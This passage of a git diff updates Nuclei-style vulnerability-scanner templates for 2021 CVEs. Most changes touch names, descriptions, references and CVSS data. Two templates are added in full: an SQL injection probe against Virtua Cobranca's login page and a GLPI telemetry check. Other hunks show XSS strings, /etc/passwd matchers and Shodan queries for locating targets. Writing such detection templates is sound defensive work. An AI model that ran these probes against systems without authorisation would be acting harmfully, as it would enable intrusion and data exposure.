+    - https://alysum5.promokit.eu/promokit/documentation/blog/
+    - https://blog.sorcery.ie
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36748
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -34,4 +36,6 @@ requests:
           - 'contains(body_1, "prestashop")'
           - "contains(tolower(all_headers_2), 'index.php?controller=404')"
           - "len(body_2) == 0"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml
index a9bbfa485c..28545da8bb 100644
--- a/cves/2021/CVE-2021-36749.yaml
+++ b/cves/2021/CVE-2021-36749.yaml
@@ -1,20 +1,16 @@
 id: CVE-2021-36749
 
 info:
-  name: Apache Druid Authentication Restrictions Bypass
+  name: Apache Druid - Local File Inclusion
   author: _0xf4n9x_
   severity: medium
-  description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended,
-    such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows
-    the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case,
-    users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0
-    or 0.21.1.
+  description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
-    - https://www.cvedetails.com/cve/CVE-2021-36749/
     - https://github.com/BrucessKING/CVE-2021-36749
+    - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2021-36749
     cwe-id: CWE-668
@@ -37,3 +33,5 @@ requests:
           - "root:.*:0:0:"
           - "druid:*:1000:1000:"
         condition: or
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml
index 25f31aa3fc..28221d2bdd 100644
--- a/cves/2021/CVE-2021-37216.yaml
+++ b/cves/2021/CVE-2021-37216.yaml
@@ -1,15 +1,14 @@
 id: CVE-2021-37216
 
 info:
-  name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
+  name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    QSAN Storage Manager header page parameters does not filter special characters.
-    Remote attackers can inject JavaScript without logging in and launch
-    reflected XSS attacks to access and modify specific data.
+    QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability.  Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.
   reference:
     - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-37216
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +39,5 @@ requests:
       - type: dsl
         dsl:
           - "!contains(tolower(all_headers), 'x-xss-protection')"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-37416.yaml b/cves/2021/CVE-2021-37416.yaml
index d534bfabf9..16c783a632 100644
--- a/cves/2021/CVE-2021-37416.yaml
+++ b/cves/2021/CVE-2021-37416.yaml
@@ -1,10 +1,15 @@
 id: CVE-2021-37416
 
 info:
-  name: Zoho ManageEngine ADSelfService Plus - Reflected XSS
+  name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.
+  description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
+    - https://blog.stmcyber.com/vulns/cve-2021-37416/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-37416
+  tags: cve,cve2021,zoho,xss
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -13,11 +18,6 @@ info:
   metadata:
     shodan-query: http.title:"ManageEngine"
     verified: true
-  reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-37416
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
-    - https://blog.stmcyber.com/vulns/cve-2021-37416/
-  tags: cve,cve2021,zoho,xss
 
 requests:
   - method: GET
@@ -40,4 +40,6 @@ requests:
         words:
           - "></iframe><script>alert(1)</script>"
           - "adsf/js/"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml
index c0abb37d4f..39ca5a1721 100644
--- a/cves/2021/CVE-2021-37538.yaml
+++ b/cves/2021/CVE-2021-37538.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://blog.sorcery.ie/posts/smartblog_sqli/
     - https://nvd.nist.gov/vuln/detail/CVE-2021-37538
+    - https://classydevs.com/free-modules/smartblog/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
index 95de7935aa..a94a5f346a 100644
--- a/cves/2021/CVE-2021-37573.yaml
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-37573
 
 info:
-  name: Tiny Java Web Server - Reflected Cross-Site Scripting
+  name: Tiny Java Web Server - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not
-    Found" error page.
+  description: A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's "404 Page not Found" error page.
   reference:
     - https://seclists.org/fulldisclosure/2021/Aug/13
     - https://nvd.nist.gov/vuln/detail/CVE-2021-37573
+    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-042.txt
+    - http://seclists.org/fulldisclosure/2021/Aug/13
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-37573
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,tjws,java
+  tags: cve,cve2021,xss,tjws,java,seclists
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-37580.yaml b/cves/2021/CVE-2021-37580.yaml
index 8c35d2d37e..93830671c7 100644
--- a/cves/2021/CVE-2021-37580.yaml
+++ b/cves/2021/CVE-2021-37580.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-37580
     - https://github.com/fengwenhua/CVE-2021-37580
+    - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb
+    - http://www.openwall.com/lists/oss-security/2021/11/16/1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-37589.yaml b/cves/2021/CVE-2021-37589.yaml
new file mode 100644
index 0000000000..b735f46aaf
--- /dev/null
+++ b/cves/2021/CVE-2021-37589.yaml
@@ -0,0 +1,62 @@
+id: CVE-2021-37589
+
+info:
+  name: Virtua Software Cobranca <12R - Blind SQL Injection
+  author: princechaddha
+  severity: high
+  description: |
+    Virtua Cobranca before 12R allows blind SQL injection on the login page.
+  reference:
+    - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
+    - https://www.virtuasoftware.com.br/
+    - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-37589
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-37589
+    cwe-id: CWE-89
+  metadata:
+    shodan-query: http.favicon.hash:876876147
+    verified: "true"
+  tags: cve,cve2021,virtua,sqli
+
+requests:
+  - raw:
+      - |
+        POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+      - |
+        POST /controller/login.php?acao=autenticar HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        idusuario='&idsenha=test&tipousr=Usuario
+
+      - |
+        POST /controller/login.php?acao=autenticar HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        idusuario=''&idsenha=a&tipousr=Usuario
+
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+
+      - type: dsl
+        dsl:
+          - 'contains(body_3, "Os parametros não estão informados corretamente")'
+          - 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
+        condition: or
+
+      - type: dsl
+        dsl:
+          - "status_code_2 == 500 && status_code_3 == 200"
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml
index 6e0504c081..b5147f128a 100644
--- a/cves/2021/CVE-2021-37704.yaml
+++ b/cves/2021/CVE-2021-37704.yaml
@@ -7,6 +7,9 @@ info:
   description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.
   reference:
     - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704
+    - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc
+    - https://packagist.org/packages/phpfastcache/phpfastcache
+    - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml
index 4909948003..d4af2272cc 100644
--- a/cves/2021/CVE-2021-37833.yaml
+++ b/cves/2021/CVE-2021-37833.yaml
@@ -1,12 +1,13 @@
 id: CVE-2021-37833
 
 info:
-  name: Hotel Druid 3.0.2 XSS
+  name: Hotel Druid 3.0.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands.
+  description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.
   reference:
     - https://github.com/dievus/CVE-2021-37833
+    - https://www.hoteldruid.com
     - https://nvd.nist.gov/vuln/detail/CVE-2021-37833
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -40,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml
index 8677ab8904..8a970ad7bc 100644
--- a/cves/2021/CVE-2021-38540.yaml
+++ b/cves/2021/CVE-2021-38540.yaml
@@ -5,9 +5,11 @@ info:
   author: pdteam
   severity: critical
   description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.
-  remediation: Upgrade to Apache Airflow 2.1.3 or higher.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-38540
+    - https://lists.apache.org/thread.html/rb34c3dd1a815456355217eef34060789f771b6f77c3a3dec77de2064%40%3Cusers.airflow.apache.org%3E
+    - https://lists.apache.org/thread.html/rac2ed9118f64733e47b4f1e82ddc8c8020774698f13328ca742b03a2@%3Cannounce.apache.org%3E
+  remediation: Upgrade to Apache Airflow 2.1.3 or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
index f8e894d27e..1e06ae5615 100644
--- a/cves/2021/CVE-2021-38647.yaml
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -11,12 +11,12 @@ info:
     - https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
     - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
     - https://github.com/microsoft/omi
+  remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-38647
-  remediation: Updates for this vulnerability were published on GitHub on August 11, 2021.
-  tags: cve,cve2021,rce,omi,microsoft
+  tags: cve,cve2021,rce,omi,microsoft,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml
index b4c3f36674..963ec25c42 100644
--- a/cves/2021/CVE-2021-38702.yaml
+++ b/cves/2021/CVE-2021-38702.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://seclists.org/fulldisclosure/2021/Aug/20
     - https://nvd.nist.gov/vuln/detail/CVE-2021-38702
+    - http://www.cyberoamworks.com/NetGenie-Home.asp
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-38702
     cwe-id: CWE-79
-  tags: cve,cve2021,cyberoam,netgenie,xss,router
+  tags: cve2021,cyberoam,netgenie,xss,router,seclists,cve
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-38704.yaml b/cves/2021/CVE-2021-38704.yaml
index 0e8db70205..2604758623 100644
--- a/cves/2021/CVE-2021-38704.yaml
+++ b/cves/2021/CVE-2021-38704.yaml
@@ -1,14 +1,14 @@
 id: CVE-2021-38704
 
 info:
-  name: ClinicCases 7.3.3 Reflected Cross-Site Scripting
+  name: ClinicCases 7.3.3 Cross-Site Scripting
   author: alph4byt3
   severity: medium
-  description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL.
-    This can result in account takeover via session token theft.
+  description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
   reference:
     - https://github.com/sudonoodle/CVE-2021-38704
     - https://nvd.nist.gov/vuln/detail/CVE-2021-38704
+    - https://github.com/judsonmitchell/ClinicCases/releases
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-39211.yaml b/cves/2021/CVE-2021-39211.yaml
new file mode 100644
index 0000000000..3cfca7f214
--- /dev/null
+++ b/cves/2021/CVE-2021-39211.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-39211
+
+info:
+  name: GLPI Telemetry Disclosure
+  author: dogasantos,noraj
+  severity: medium
+  description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39211
+    - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
+    - https://github.com/glpi-project/glpi/releases/tag/9.5.6
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2021-39211
+    cwe-id: CWE-668,CWE-200
+  tags: cve,cve2021,glpi,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ajax/telemetry.php"
+      - "{{BaseURL}}/glpi/ajax/telemetry.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"uuid":'
+          - '"glpi":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-39226.yaml b/cves/2021/CVE-2021-39226.yaml
index 8336a32acc..771dc8be3c 100644
--- a/cves/2021/CVE-2021-39226.yaml
+++ b/cves/2021/CVE-2021-39226.yaml
@@ -3,21 +3,22 @@ id: CVE-2021-39226
 info:
   name: Grafana Snapshot - Authentication Bypass
   author: Evan Rubinstein
-  severity: critical
-  description: "Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key.
-    If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints
-    /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default)."
+  severity: high
+  description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
   reference:
     - https://github.com/advisories/GHSA-69j6-29vr-p3j9
     - https://nvd.nist.gov/vuln/detail/CVE-2021-39226
+    - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269
+    - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/
+  remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.'
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
     cve-id: CVE-2021-39226
-    cwe-id: CWE-200
-  remediation: "This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key,
-    and /api/snapshots/:key. They have no normal function and can be disabled without side effects."
-  tags: cve,cve2021,grafana
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: title:"Grafana"
+  tags: cve,cve2021,grafana,kev
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-39312.yaml b/cves/2021/CVE-2021-39312.yaml
index 738140dbed..15ebd64523 100644
--- a/cves/2021/CVE-2021-39312.yaml
+++ b/cves/2021/CVE-2021-39312.yaml
@@ -1,20 +1,22 @@
 id: CVE-2021-39312
 
 info:
-  name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
+  name: WordPress True Ranker <2.2.4 - Local File Inclusion
   author: DhiyaneshDK
   severity: high
-  description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
-  remediation: Fixed in version 2.2.4
+  description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.
   reference:
     - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312
+    - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php
     - https://nvd.nist.gov/vuln/detail/CVE-2021-39312
-  tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021
+  remediation: Fixed in version 2.2.4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.50
+    cvss-score: 7.5
     cve-id: CVE-2021-39312
     cwe-id: CWE-22,CWE-22
+  tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress
 
 requests:
   - raw:
@@ -38,3 +40,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml
index f2125025ea..661f565538 100644
--- a/cves/2021/CVE-2021-39316.yaml
+++ b/cves/2021/CVE-2021-39316.yaml
@@ -1,19 +1,22 @@
 id: CVE-2021-39316
 
 info:
-  name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval
+  name: WordPress DZS Zoomsounds <=6.50 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter.
+  description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
   reference:
     - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316
+    - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39316
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-39316
     cwe-id: CWE-22
-  tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds
+  tags: wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,cve,wp,cve2021,lfi
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml
index f39d66e645..ee5d215641 100644
--- a/cves/2021/CVE-2021-39320.yaml
+++ b/cves/2021/CVE-2021-39320.yaml
@@ -1,20 +1,20 @@
 id: CVE-2021-39320
 
 info:
-  name: WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting
+  name: WordPress underConstruction Plugin< 1.19 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible
-    to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
+  description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
   reference:
     - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
     - https://nvd.nist.gov/vuln/detail/CVE-2021-39320
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-39320
     cwe-id: CWE-79
-  tags: wordpress,xss,cve,cve2021,wp-plugin
+  tags: wordpress,xss,cve,cve2021,wp-plugin,wpscan
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-39322.yaml b/cves/2021/CVE-2021-39322.yaml
index e7c7a298e1..cfa84f8dad 100644
--- a/cves/2021/CVE-2021-39322.yaml
+++ b/cves/2021/CVE-2021-39322.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-39322
 
 info:
-  name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting
+  name: WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to
-    use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
+  description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
   reference:
     - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
     - https://nvd.nist.gov/vuln/detail/CVE-2021-39322
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322
+    - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-39322
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml
index 1b01790c84..2022351c16 100644
--- a/cves/2021/CVE-2021-39327.yaml
+++ b/cves/2021/CVE-2021-39327.yaml
@@ -4,8 +4,7 @@ info:
   name: WordPress BulletProof Security 5.1 Information Disclosure
   author: geeknik
   severity: medium
-  description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers
-    the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.
+  description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.
   reference:
     - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt
     - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327
@@ -15,7 +14,7 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2021-39327
     cwe-id: CWE-200
-  tags: cve,cve2021,wordpress,exposures
+  tags: exposures,packetstorm,cve,cve2021,wordpress
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-39350.yaml b/cves/2021/CVE-2021-39350.yaml
index 8302f943aa..59733c6f05 100644
--- a/cves/2021/CVE-2021-39350.yaml
+++ b/cves/2021/CVE-2021-39350.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-39350
 
 info:
-  name: FV Flowplayer Video Player WordPress plugin  - Authenticated Reflected Cross-Site Scripting
+  name: FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting
   author: gy741
   severity: medium
-  description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary
-    web scripts in versions 7.5.0.727 - 7.5.2.727.
+  description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.
   reference:
     - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
     - https://nvd.nist.gov/vuln/detail/CVE-2021-39350
+    - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php
+    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-39350
     cwe-id: CWE-79
